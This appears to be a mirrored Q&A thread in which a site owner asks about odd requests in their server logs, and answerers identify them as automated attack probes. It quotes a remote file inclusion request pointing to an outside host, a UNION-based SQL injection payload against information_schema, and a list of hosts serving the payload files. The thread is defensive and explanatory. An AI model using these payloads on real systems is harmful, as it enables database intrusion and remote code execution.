开发者

Is this an injection attempt or a normal request?

开发者 https://www.devze.com 2022-12-29 07:22 出处:网络
In cPanel\'s Analog Stats statistics module, I\'ve noticed countless requests to connect to the following example:

In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:

/?x=19&y=15

The numbers are random, but its always setting x and y variables.

Anot开发者_StackOverflow中文版her category of mysterious requests:

/?id=http://nic.bupt.edu.cn/media/j1.txt??

There are other attempts at injections in the request log that have straight sql written into them as well. Example:

 /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--

It looks like they are all reaching a 404, but I'm still wondering about the intent behind these.

I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason.

Any suggestions as to what all these are?


EDIT

I pulled all of these out of the request lists and sliced off the txt they are pointing to. Maybe this provides more help as to what kind of attacks these are.

http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com

Also, in phpMyAdmin status section, it shows ~900 change db queries per hour. Can a user with only select privs do any real damage to the db? There is no personal info on it, but these SOB's are clogging up the bandwidth.


These (except for the top one) are automated(?) attempts to find weaknesses in the code;

/?id=http://nic.bupt.edu.cn/media/j1.txt??

Tries to import a PHP page from another server. A well-known problem especially with older PHP software.

The "UNION ALL SELECT 1" is an obvious SQL insertion attempt. schema ID 0x73636363726F6F745F7075626C6963 decodes to "scccroot_public". I'm not sure for which database this is. But they are trying to take control of it, that's sure.


The x=19&y=15 looks like you have a form on your site with method=get and an input type=image. Do you log referrer?


/?x=19&y=15 could represent an <input type="image" />


/?id=http://nic.bupt.edu.cn/media/j1.txt?? looks like some sort of cross-site stuff, a useless one because it loads a plain text file O_O

0

精彩评论

暂无评论...
验证码 换一张
取 消